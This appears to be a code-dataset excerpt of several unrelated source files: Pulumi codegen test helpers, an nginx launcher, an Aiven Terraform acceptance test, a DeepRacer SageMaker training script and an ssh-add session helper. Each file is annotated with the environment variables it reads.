func GeneratePackageFilesFromSchema(schemaPath string, genPackageFunc GenPkgSignature) (map[string][]byte, error) {
// Read in, decode, and import the schema.
schemaBytes, err := ioutil.ReadFile(schemaPath)
if err != nil {
return nil, err
}
ext := filepath.Ext(schemaPath)
var pkgSpec schema.PackageSpec
if ext == ".yaml" || ext == ".yml" {
err = yaml.Unmarshal(schemaBytes, &pkgSpec)
} else {
err = json.Unmarshal(schemaBytes, &pkgSpec)
}
if err != nil {
return nil, err
}
pkg, err := schema.ImportSpec(pkgSpec, nil)
if err != nil {
return nil, err
}
return genPackageFunc("test", pkg, nil)
}
// LoadFiles loads the provided list of files from a directory.
func LoadFiles(dir, lang string, files []string) (map[string][]byte, error) {
result := map[string][]byte{}
for _, file := range files {
fileBytes, err := ioutil.ReadFile(filepath.Join(dir, lang, file))
if err != nil {
return nil, err
}
result[file] = fileBytes
}
return result, nil
}
func PathExists(path string) (bool, error) {
_, err := os.Stat(path)
if os.IsNotExist(err) {
return false, nil
}
if err == nil {
return true, nil
}
return false, err
}
// `LoadBaseline` loads the contents of the given baseline directory,
// by inspecting its `codegen-manifest.json`.
func LoadBaseline(dir, lang string) (map[string][]byte, error) {
cm := &codegenManifest{}
err := cm.load(filepath.Join(dir, lang))
if err != nil {
return nil, fmt.Errorf("Failed to load codegen-manifest.json: %w", err)
}
files := make(map[string][]byte)
for _, f := range cm.EmittedFiles {
bytes, err := ioutil.ReadFile(filepath.Join(dir, lang, f))
if err != nil {
return nil, fmt.Errorf("Failed to load file %s referenced in codegen-manifest.json: %w", f, err)
}
files[f] = bytes
}
return files, nil
}
type codegenManifest struct {
EmittedFiles []string `json:"emittedFiles"`
}
func (cm *codegenManifest) load(dir string) error {
bytes, err := ioutil.ReadFile(filepath.Join(dir, "codegen-manifest.json"))
if err != nil {
return err
}
return json.Unmarshal(bytes, cm)
}
func (cm *codegenManifest) save(dir string) error {
sort.Strings(cm.EmittedFiles)
buf := &bytes.Buffer{}
enc := json.NewEncoder(buf)
enc.SetIndent("", " ")
err := enc.Encode(cm)
if err != nil {
return err
}
data := buf.Bytes()
return ioutil.WriteFile(filepath.Join(dir, "codegen-manifest.json"), data, 0600)
}
// ValidateFileEquality compares maps of files for equality.
func ValidateFileEquality(t *testing.T, actual, expected map[string][]byte) bool {
ok := true
for name, file := range expected {
_, inActual := actual[name]
if inActual {
if !assert.Equal(t, string(file), string(actual[name]), name) {
t.Logf("%s did not agree", name)
ok = false
}
} else {
t.Logf("File %s was expected but is missing from the actual fileset", name)
ok = false
}
}
for name := range actual {
if _, inExpected := expected[name]; !inExpected {
t.Logf("File %s from the actual fileset was not expected", name)
ok = false
}
}
return ok
}
// If PULUMI_ACCEPT is set, writes out actual output to the expected
// file set, so we can continue enjoying golden tests without manually
// modifying the expected output.
func RewriteFilesWhenPulumiAccept(t *testing.T, dir, lang string, actual map[string][]byte) bool {
if os.Getenv("PULUMI_ACCEPT") == "" {
return false
}
cm := &codegenManifest{}
baseline := filepath.Join(dir, lang)
// Remove the baseline directory's current contents.
_, err := os.ReadDir(baseline)
switch {
case err == nil:
err = os.RemoveAll(baseline)
require.NoError(t, err)
case os.IsNotExist(err):
// OK
default:
require.NoError(t, err)
}
for file, bytes := range actual {
relPath := filepath.FromSlash(file)
path := filepath.Join(dir, lang, relPath)
cm.EmittedFiles = append(cm.EmittedFiles, relPath)
err := writeFileEnsuringDir(path, bytes)
require.NoError(t, err)
}
err = cm.save(filepath.Join(dir, lang))
require.NoError(t, err)
return true
}
// Useful for populating code-generated destination
// `codeDir=$dir/$lang` with extra manually written files such as the
// unit test files. These files are copied from `$dir/$lang-extras`
// folder if present.
func CopyExtraFiles(t *testing.T, dir, lang string) {
codeDir := filepath.Join(dir, lang)
extrasDir := filepath.Join(dir, fmt.Sprintf("%s-extras", lang))
gotExtras, err := PathExists(extrasDir)
if !gotExtras {
return
}
if err != nil {
require.NoError(t, err)
return
}
err = filepath.Walk(extrasDir, func(path string, info os.FileInfo, err error) error {
if err != nil {
return err
}
if info.IsDir() {
return nil
}
relPath, err := filepath.Rel(extrasDir, path)
if err != nil {
return err
}
destPath := filepath.Join(codeDir, relPath)
bytes, err := ioutil.ReadFile(path)
if err != nil {
return err
}
err = writeFileEnsuringDir(destPath, bytes)
if err != nil {
return err
}
t.Logf("Copied %s to %s", path, destPath)
return nil
})
require.NoError(t, err)
}
func writeFileEnsuringDir(path string, bytes []byte) error {
if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil && !os.IsExist(err) {
return err
}
return ioutil.WriteFile(path, bytes, 0600)
}
// CheckAllFilesGenerated ensures that the set of expected and actual files generated
// are exactly equivalent.
func CheckAllFilesGenerated(t *testing.T, actual, expected map[string][]byte) {
seen := map[string]bool{}
for x := range expected {
seen[x] = true
}
for a := range actual {
assert.Contains(t, seen, a, "Unexpected file generated: %s", a)
if seen[a] {
delete(seen, a)
}
}
for s := range seen {
assert.Fail(t, "No content generated for expected file %s", s)
}
}
// Validates a transformer on a single file.
func ValidateFileTransformer(
t *testing.T,
inputFile string,
expectedOutputFile string,
transformer func(reader io.Reader, writer io.Writer) error) {
reader, err := os.Open(inputFile)
if err != nil {
t.Error(err)
return
}
var buf bytes.Buffer
err = transformer(reader, &buf)
if err != nil {
t.Error(err)
return
}
actualBytes := buf.Bytes()
if os.Getenv("PULUMI_ACCEPT") != "" {
err := ioutil.WriteFile(expectedOutputFile, actualBytes, 0600)
if err != nil {
t.Error(err)
return
}
}
actual := map[string][]byte{expectedOutputFile: actualBytes}
expectedBytes, err := ioutil.ReadFile(expectedOutputFile)
if err != nil {
t.Error(err)
return
}
expected := map[string][]byte{expectedOutputFile: expectedBytes}
ValidateFileEquality(t, actual, expected)
}
func RunCommand(t *testing.T, name string, cwd string, exec string, args ...string) {
RunCommandWithOptions(t, &integration.ProgramTestOptions{}, name, cwd, exec, args...)
}
func RunCommandWithOptions(
t *testing.T,
opts *integration.ProgramTestOptions,
name string, cwd string, exec string, args ...string) {
exec, err := executable.FindExecutable(exec)
if err != nil {
t.Error(err)
t.FailNow()
}
wd, err := filepath.Abs(cwd)
require.NoError(t, err)
var stdout, stderr bytes.Buffer
opts.Stdout = &stdout
opts.Stderr = &stderr
opts.Verbose = true
err = integration.RunCommand(t,
name,
append([]string{exec}, args...),
wd,
opts)
if !assert.NoError(t, err) {
stdout := stdout.String()
stderr := stderr.String()
if len(stdout) > 0 {
t.Logf("stdout: %s", stdout)
}
if len(stderr) > 0 {
t.Logf("stderr: %s", stderr)
}
t.FailNow()
}
}
type SchemaVersion = string
const (
AwsSchema SchemaVersion = "4.26.0"
AzureNativeSchema SchemaVersion = "1.29.0"
AzureSchema SchemaVersion = "4.18.0"
KubernetesSchema SchemaVersion = "3.7.2"
RandomSchema SchemaVersion = "4.2.0"
)
var schemaVersions = map[string]struct {
version SchemaVersion
url string
}{
"aws.json": {
version: AwsSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-aws/v%s/provider/cmd/pulumi-resource-aws/schema.json", //nolint:lll
},
"azure.json": {
version: AzureSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-azure/v%s/provider/cmd/pulumi-resource-azure/schema.json",
},
"azure-native.json": {
version: AzureNativeSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-azure-native/v%s/provider/cmd/pulumi-resource-azure-native/schema.json", //nolint:lll
},
"kubernetes.json": {
version: KubernetesSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-kubernetes/v%s/provider/cmd/pulumi-resource-kubernetes/schema.json", //nolint:lll
},
"random.json": {
version: RandomSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-random/v%s/provider/cmd/pulumi-resource-random/schema.json",
},
}
// ensureValidSchemaVersions ensures that we have downloaded valid schema for
// the tests. If it does not find such schema, or the schema found have the
// wrong version, the function downloads correct schema.
func ensureValidSchemaVersions(t *testing.T) {
c := make(chan error)
updates := 0
for k, v := range schemaVersions {
path := filepath.Join("..", "internal", "test", "testdata", k)
current, err := currentVersion(path)
var isJSONSyntaxError bool
if err != nil {
_, isJSONSyntaxError = err.(*json.SyntaxError)
}
if os.IsNotExist(err) || isJSONSyntaxError || (err == nil && current != v.version) {
t.Logf("Updating %s from %s to %s", k, current, v.version)
updates++
go replaceSchema(c, path, v.version, v.url)
} else if err != nil {
t.Errorf("failed to get schema version: %s", err)
}
}
var err error
for i := 0; i < updates; i++ {
err = <-c
if err != nil {
t.Errorf("failed to update schema: %s", err)
}
}
if err != nil {
t.FailNow()
}
}
// Reads the current version of the installed package schema
func currentVersion(path string) (string, error) {
str, err := ioutil.ReadFile(path)
if err != nil {
return "", err
}
var data interface{}
err = json.Unmarshal(str, &data)
if err != nil {
return "", err
}
json, ok := data.(map[string]interface{})
if !ok {
return "", fmt.Errorf("%s could not be read", path)
}
version, ok := json["version"]
if !ok {
return "", errors.New("Could not find version field")
}
versionString, ok := version.(string)
if !ok {
return "", errors.New("version value is not a string")
}
return versionString, nil
}
// Replaces the installed package schema with one containing the correct version.
func replaceSchema(c chan error, path, version, url string) {
// This is safe because url is always a reference to a page Pulumi
// controls in github.
resp, err := http.Get(fmt.Sprintf(url, version)) //nolint:gosec
if err != nil {
c <- err
return
}
defer resp.Body.Close()
err = os.Remove(path)
if !os.IsNotExist(err) && err != nil {
c <- fmt.Errorf("failed to replace schema: %w", err)
return
}
schemaFile, err := os.Create(path)
if err != nil {
c <- err
return
}
defer schemaFile.Close()
var schemaRaw interface{}
decoder := json.NewDecoder(resp.Body)
err = decoder.Decode(&schemaRaw)
if err != nil {
c <- err
return
}
schema, ok := schemaRaw.(map[string]interface{})
if !ok {
c <- errors.New("failed to convert schema to map")
return
}
schema["version"] = version
encoded, err := json.MarshalIndent(schema, "", " ")
if err != nil {
c <- err
return
}
written, err := schemaFile.Write(encoded)
if err != nil {
c <- err
} else if written != len(encoded) {
c <- errors.New("failed to write full message")
} else {
c <- nil
}
}
| [
"\"PULUMI_ACCEPT\"",
"\"PULUMI_ACCEPT\""
] | [] | [
"PULUMI_ACCEPT"
] | [] | ["PULUMI_ACCEPT"] | go | 1 | 0 | |
new/bases/service/nginx/nginx-start.go | package main
import (
"bytes"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"os/signal"
"path/filepath"
"strings"
"syscall"
"text/template"
"time"
"github.com/fatih/color"
)
func main() {
port := os.Getenv("ProPORT")
if port == "" {
port = "8000"
}
addr := ":" + port
process := startNginx(port)
log.Printf("starting.(%s)", addr)
waitPortReady(process.Pid, addr)
log.Println(color.GreenString("frontend started. (%s)", addr))
// SIGUSR1 for log reopen
c := make(chan os.Signal, 1)
signal.Notify(c, syscall.SIGUSR1, syscall.SIGQUIT, syscall.SIGTERM, syscall.SIGINT)
for {
if err := process.Signal(<-c); err != nil {
log.Println(err)
}
}
}
func startNginx(port string) *os.Process {
generateConf(port)
cmd := exec.Command("nginx")
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
if err := cmd.Start(); err != nil {
log.Fatal(err)
}
go func() {
if err := cmd.Wait(); err != nil {
log.Fatal(err)
} else {
log.Println("shutdown")
os.Exit(0)
}
}()
return cmd.Process
}
func generateConf(port string) {
config := struct {
ListenPort string
SendfileOff bool
}{
ListenPort: port,
SendfileOff: os.Getenv("SendfileOff") == "true",
}
tmplFiles, err := filepath.Glob("/etc/nginx/sites-available/*.conf.tmpl")
if err != nil {
log.Panic(err)
}
for _, tmplFile := range tmplFiles {
var buf bytes.Buffer
if err := template.Must(template.ParseFiles(tmplFile)).Execute(&buf, config); err != nil {
log.Panic(err)
}
confFile := `/etc/nginx/sites-enabled/` + strings.TrimSuffix(filepath.Base(tmplFile), `.tmpl`)
if err := ioutil.WriteFile(confFile, buf.Bytes(), 0644); err != nil {
log.Panic(err)
}
}
}
func waitPortReady(pid int, addr string) {
for i := 0; i < 7; i++ {
cmd := exec.Command("lsof", "-aP", "-i"+addr, "-stcp:listen")
cmd.Stderr = os.Stderr
out, err := cmd.Output()
if err != nil {
log.Fatal(err)
}
if len(out) > 0 {
fmt.Print(string(out))
return
}
time.Sleep(time.Second)
}
log.Printf("waitPortReady timeout(%s)\n", addr)
os.Exit(1)
}
| [
"\"ProPORT\"",
"\"SendfileOff\""
] | [] | [
"ProPORT",
"SendfileOff"
] | [] | ["ProPORT", "SendfileOff"] | go | 2 | 0 | |
aiven/resource_connection_pool_test.go | package aiven
import (
"fmt"
"os"
"testing"
"github.com/aiven/aiven-go-client"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/acctest"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
)
func init() {
resource.AddTestSweepers("aiven_connection_pool", &resource.Sweeper{
Name: "aiven_connection_pool",
F: sweepConnectionPools,
})
}
func sweepConnectionPools(region string) error {
client, err := sharedClient(region)
if err != nil {
return fmt.Errorf("error getting client: %s", err)
}
conn := client.(*aiven.Client)
projects, err := conn.Projects.List()
if err != nil {
return fmt.Errorf("error retrieving a list of projects : %s", err)
}
for _, project := range projects {
if project.Name == os.Getenv("AIVEN_PROJECT_NAME") {
services, err := conn.Services.List(project.Name)
if err != nil {
return fmt.Errorf("error retrieving a list of services for a project `%s`: %s", project.Name, err)
}
for _, service := range services {
list, err := conn.ConnectionPools.List(project.Name, service.Name)
if err != nil {
if err.(aiven.Error).Status == 403 {
continue
}
return fmt.Errorf("error retrieving a list of connection pools for a service `%s`: %s", service.Name, err)
}
for _, pool := range list {
err = conn.ConnectionPools.Delete(project.Name, service.Name, pool.PoolName)
if err != nil {
return fmt.Errorf("error destroying connection pool `%s` during sweep: %s", pool.PoolName, err)
}
}
}
}
}
return nil
}
func TestAccAivenConnectionPool_basic(t *testing.T) {
resourceName := "aiven_connection_pool.foo"
rName := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
rName2 := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
resource.ParallelTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
ProviderFactories: testAccProviderFactories,
CheckDestroy: testAccCheckAivenConnectionPoolResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccConnectionPoolResource(rName),
Check: resource.ComposeTestCheckFunc(
testAccCheckAivenConnectionPoolAttributes("data.aiven_connection_pool.pool"),
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "username", fmt.Sprintf("user-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_name", fmt.Sprintf("test-acc-pool-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_size", "25"),
resource.TestCheckResourceAttr(resourceName, "pool_mode", "transaction"),
),
},
{
Config: testAccConnectionPoolNoUserResource(rName2),
Check: resource.ComposeTestCheckFunc(
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName2)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName2)),
resource.TestCheckResourceAttr(resourceName, "pool_name", fmt.Sprintf("test-acc-pool-%s", rName2)),
resource.TestCheckResourceAttr(resourceName, "pool_size", "25"),
resource.TestCheckResourceAttr(resourceName, "pool_mode", "transaction"),
),
},
},
})
}
func testAccConnectionPoolNoUserResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_pg" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
}
resource "aiven_database" "foo" {
project = aiven_pg.bar.project
service_name = aiven_pg.bar.service_name
database_name = "test-acc-db-%s"
}
resource "aiven_connection_pool" "foo" {
service_name = aiven_pg.bar.service_name
project = data.aiven_project.foo.project
database_name = aiven_database.foo.database_name
pool_name = "test-acc-pool-%s"
pool_size = 25
pool_mode = "transaction"
depends_on = [aiven_database.foo]
}
data "aiven_connection_pool" "pool" {
project = aiven_connection_pool.foo.project
service_name = aiven_connection_pool.foo.service_name
pool_name = aiven_connection_pool.foo.pool_name
depends_on = [aiven_connection_pool.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name, name)
}
func testAccConnectionPoolResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_pg" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
}
resource "aiven_service_user" "foo" {
service_name = aiven_pg.bar.service_name
project = data.aiven_project.foo.project
username = "user-%s"
}
resource "aiven_database" "foo" {
project = aiven_pg.bar.project
service_name = aiven_pg.bar.service_name
database_name = "test-acc-db-%s"
}
resource "aiven_connection_pool" "foo" {
service_name = aiven_pg.bar.service_name
project = data.aiven_project.foo.project
database_name = aiven_database.foo.database_name
username = aiven_service_user.foo.username
pool_name = "test-acc-pool-%s"
pool_size = 25
pool_mode = "transaction"
depends_on = [aiven_database.foo]
}
data "aiven_connection_pool" "pool" {
project = aiven_connection_pool.foo.project
service_name = aiven_connection_pool.foo.service_name
pool_name = aiven_connection_pool.foo.pool_name
depends_on = [aiven_connection_pool.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name, name, name)
}
func testAccCheckAivenConnectionPoolAttributes(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
r := s.RootModule().Resources[n]
a := r.Primary.Attributes
if a["project"] == "" {
return fmt.Errorf("expected to get a project name from Aiven")
}
if a["service_name"] == "" {
return fmt.Errorf("expected to get a service_name from Aiven")
}
if a["pool_name"] == "" {
return fmt.Errorf("expected to get a pool_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
if a["username"] == "" {
return fmt.Errorf("expected to get a username from Aiven")
}
if a["pool_size"] != "25" {
return fmt.Errorf("expected to get a correct pool_size from Aiven")
}
if a["pool_mode"] != "transaction" {
return fmt.Errorf("expected to get a correct pool_mode from Aiven")
}
return nil
}
}
func testAccCheckAivenConnectionPoolResourceDestroy(s *terraform.State) error {
c := testAccProvider.Meta().(*aiven.Client)
// loop through the resources in state, verifying each connection pool is destroyed
for _, rs := range s.RootModule().Resources {
if rs.Type != "aiven_connection_pool" {
continue
}
projectName, serviceName, databaseName := splitResourceID3(rs.Primary.ID)
pool, err := c.ConnectionPools.Get(projectName, serviceName, databaseName)
if err != nil {
if err.(aiven.Error).Status != 404 {
return err
}
}
if pool != nil {
return fmt.Errorf("connection pool (%s) still exists", rs.Primary.ID)
}
}
return nil
}
| [
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\""
] | [] | [
"AIVEN_PROJECT_NAME"
] | [] | ["AIVEN_PROJECT_NAME"] | go | 1 | 0 | |
rl_coach/rl_deepracer_coach_robomaker.py | #!/usr/bin/env python
# coding: utf-8
import sagemaker
import boto3
import sys
import os
import glob
import re
import subprocess
from IPython.display import Markdown
from time import gmtime, strftime
sys.path.append("common")
from misc import get_execution_role, wait_for_s3_object
from sagemaker.rl import RLEstimator, RLToolkit, RLFramework
from markdown_helper import *
# S3 bucket
boto_session = boto3.session.Session(
aws_access_key_id=os.environ.get("AWS_ACCESS_KEY_ID", "minio"),
aws_secret_access_key=os.environ.get("AWS_SECRET_ACCESS_KEY", "miniokey"),
region_name=os.environ.get("AWS_REGION", "us-east-1"))
s3Client = boto_session.resource("s3", use_ssl=False,
endpoint_url=os.environ.get("S3_ENDPOINT_URL", "http://127.0.0.1:9000"))
sage_session = sagemaker.local.LocalSession(boto_session=boto_session, s3_client=s3Client)
s3_bucket = os.environ.get("MODEL_S3_BUCKET", "bucket") #sage_session.default_bucket()
s3_output_path = 's3://{}/'.format(s3_bucket) # SDK appends the job name and output folder
# ### Define Variables
# We define variables such as the job prefix for the training jobs and s3_prefix for storing metadata required for synchronization between the training and simulation jobs
job_name_prefix = 'rl-deepracer' # this should be MODEL_S3_PREFIX, but that already ends with "-sagemaker"
# create unique job name
tm = gmtime()
job_name = s3_prefix = job_name_prefix + "-sagemaker"#-" + strftime("%y%m%d-%H%M%S", tm) #Ensure S3 prefix contains SageMaker
s3_prefix_robomaker = job_name_prefix + "-robomaker"#-" + strftime("%y%m%d-%H%M%S", tm) #Ensure that the S3 prefix contains the keyword 'robomaker'
# Duration of job in seconds (5 hours)
job_duration_in_seconds = 24 * 60 * 60
aws_region = sage_session.boto_region_name
if aws_region not in ["us-west-2", "us-east-1", "eu-west-1"]:
raise Exception("This notebook uses RoboMaker which is available only in US East (N. Virginia), US West (Oregon) and EU (Ireland). Please switch to one of these regions.")
print("Model checkpoints and other metadata will be stored at: {}{}".format(s3_output_path, job_name))
s3_location = "s3://%s/%s" % (s3_bucket, s3_prefix)
print("Uploading to " + s3_location)
metric_definitions = [
# Training> Name=main_level/agent, Worker=0, Episode=19, Total reward=-102.88, Steps=19019, Training iteration=1
{'Name': 'reward-training',
'Regex': '^Training>.*Total reward=(.*?),'},
# Policy training> Surrogate loss=-0.32664725184440613, KL divergence=7.255815035023261e-06, Entropy=2.83156156539917, training epoch=0, learning_rate=0.00025
{'Name': 'ppo-surrogate-loss',
'Regex': '^Policy training>.*Surrogate loss=(.*?),'},
{'Name': 'ppo-entropy',
'Regex': '^Policy training>.*Entropy=(.*?),'},
# Testing> Name=main_level/agent, Worker=0, Episode=19, Total reward=1359.12, Steps=20015, Training iteration=2
{'Name': 'reward-testing',
'Regex': '^Testing>.*Total reward=(.*?),'},
]
# We use the RLEstimator for training RL jobs.
#
# 1. Specify the source directory which has the environment file, preset and training code.
# 2. Specify the entry point as the training code
# 3. Specify the choice of RL toolkit and framework. This automatically resolves to the ECR path for the RL Container.
# 4. Define the training parameters such as the instance count, instance type, job name, s3_bucket and s3_prefix for storing model checkpoints and metadata. **Only 1 training instance is supported for now.**
# 4. Set the RLCOACH_PRESET as "deepracer" for this example.
# 5. Define the metrics definitions that you are interested in capturing in your logs. These can also be visualized in CloudWatch and SageMaker Notebooks.
# In[ ]:
RLCOACH_PRESET = "deepracer"
# 'local' for cpu, 'local_gpu' for nvidia gpu (and then you don't have to set default runtime to nvidia)
instance_type = "local"
estimator = RLEstimator(entry_point="training_worker.py",
source_dir='src',
dependencies=["common/sagemaker_rl"],
toolkit=RLToolkit.COACH,
toolkit_version='0.11',
framework=RLFramework.TENSORFLOW,
sagemaker_session=sage_session,
#bypass sagemaker SDK validation of the role
role="aaa/",
train_instance_type=instance_type,
train_instance_count=1,
output_path=s3_output_path,
base_job_name=job_name_prefix,
image_name="crr0004/sagemaker-rl-tensorflow:console",
train_max_run=job_duration_in_seconds, # Maximum runtime in seconds
hyperparameters={"s3_bucket": s3_bucket,
"s3_prefix": s3_prefix,
"aws_region": aws_region,
"model_metadata_s3_key": "s3://{}/custom_files/model_metadata.json".format(s3_bucket),
"RLCOACH_PRESET": RLCOACH_PRESET,
#"pretrained_s3_bucket": "{}".format(s3_bucket),
#"pretrained_s3_prefix": "rl-deepracer-pretrained"
"loss_type": "mean squared error",
# "batch_size": 64,
# "num_epochs": 10,
# "beta_entropy": 0.01,
# "lr": 0.0003,
# "num_episodes_between_training": 20,
# "discount_factor": 0.999
},
metric_definitions = metric_definitions,
s3_client=s3Client
#subnets=default_subnets, # Required for VPC mode
#security_group_ids=default_security_groups, # Required for VPC mode
)
estimator.fit(job_name=job_name, wait=False)
| [] | [] | [
"MODEL_S3_BUCKET",
"AWS_SECRET_ACCESS_KEY",
"AWS_REGION",
"S3_ENDPOINT_URL",
"AWS_ACCESS_KEY_ID"
] | [] | ["MODEL_S3_BUCKET", "AWS_SECRET_ACCESS_KEY", "AWS_REGION", "S3_ENDPOINT_URL", "AWS_ACCESS_KEY_ID"] | python | 5 | 0 | |
tools/sshsession.py | #!/usr/bin/env python3
"""
Usage:
sshsession.py [options] [SSHKEY...]
options:
-h, --help Show this screen and exit.
"""
import os
import re
import subprocess
import sys
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
from pathlib import Path
from docopt import docopt
# TODO check ssh path exists
# TODO add unit tests
# TODO add bash prompt coloring
# Update PS1 command use output from PROMPT_COMMAND
# TODO does not work after current bash rework
# Fri Apr 12 01:39:15 CEST 2019
used_keys = []
def main():
# parse docopt
opt = docopt(__doc__, sys.argv[1:])
home = os.environ["HOME"]
main.ssh_path = Path(home, ".ssh")
success = False
ssh_keys = opt.get("SSHKEY", [])
if len(ssh_keys) is 0:
success = run_interactive(main.ssh_path)
else:
success = run_non_interactive(main.ssh_path, ssh_keys)
if success:
print()
run_sshsession()
else:
logger.info("Failed sshsession.")
sys.exit(1)
def run_sshsession(custom_prompt=True):
import tempfile
global used_keys
with tempfile.NamedTemporaryFile(delete=True) as f:
prompt = ""
if custom_prompt:
COLOR = "\[\033[0;33m\]"
COLOR_NONE = "\[\033[0m\]"
prompt= r"""
PS1="({1}SSHSESSION{2} {0})
$(__set_custom_bash_prompt $? "\u" '@\h#\W]$ ')"
""".format(used_keys, COLOR, COLOR_NONE)
bash_cmd = r"""
source ~/.bashrc
{0}
""".format(prompt)
with open(f.name, "w") as fo:
fo.write(bash_cmd)
command = [
"/usr/bin/bash",
"--rcfile",
f.name,
]
subprocess.call(command)
def run_non_interactive(path, ssh_keys):
global used_keys
added_once = False
for ssh_key in ssh_keys:
key_path = path.joinpath(ssh_key)
used_keys.append(os.basename(str(key_path)))
proc = add_ssh_key(key_path)
if not added_once and proc.returncode is 0:
added_once = True
return added_once
def run_interactive(path):
global used_keys
cwd = os.getcwd()
os.chdir(str(path))
ids = os.listdir(".")
ids = get_ids(ids)
os.chdir(cwd)
ids = sorted(ids)
menu = create_interactive_menu(ids)
choice=-1
while True:
print(menu)
choice = interactive_input(ids)
if choice is not None:
key = ids[choice]
used_keys.append(os.path.basename(str(key)))
proc = add_ssh_key(path.joinpath(key))
if proc.returncode is 0:
return True
else:
return False
else:
print(choice)
logger.info("Invalid choice")
def interactive_input(ids):
try:
choice = input("Your choice: ")
choice = int(choice) - 1
except ValueError:
return None
except (KeyboardInterrupt, EOFError):
logger.error("bye")
sys.exit(0)
if is_in_bounds(choice, ids):
return choice
else:
return None
def get_ids(items):
import subprocess
ids = []
found = False
valid_keyfiletype = "PEM RSA private key"
for item in items:
command = ["file", item]
result = subprocess.Popen(command,
stderr=subprocess.DEVNULL,
stdout=subprocess.PIPE)
result = result.stdout.read().decode("UTF-8").split(":")
f, filetype = result
f = f.strip()
filetype = filetype.strip()
if filetype == valid_keyfiletype:
ids.append(item)
return ids
def is_in_bounds(choice, items):
length = len(items)
if choice >= 0 and choice < length:
return True
else:
return False
def create_interactive_menu(ids):
output = "{:#^40}".format("Available ssh ids")
output += "\nSelect an id:"
for nr,key in enumerate(ids,1):
output += "\n {}\t{}".format(nr,key)
return output
def add_ssh_key(key):
# strip away .pub to get private key file
if not key.is_file():
logger.info("Key {} does not exist.".format(str(key)))
return False
key = remove_suffix(str(key), ".pub")
return subprocess.run(["/usr/bin/ssh-add", key])
def remove_suffix(string, suffix):
if not string.endswith(suffix):
return string
position = string.find(suffix)
return string[:position]
if __name__ == "__main__":
if os.name is not "posix":
logger.info("OS not supported.")
sys.exit(1)
try:
main()
except KeyboardInterrupt:
logger.error("\nbye")
sys.exit(0)
################################################################################
# Tests
| [] | [] | [
"HOME"
] | [] | ["HOME"] | python | 1 | 0 |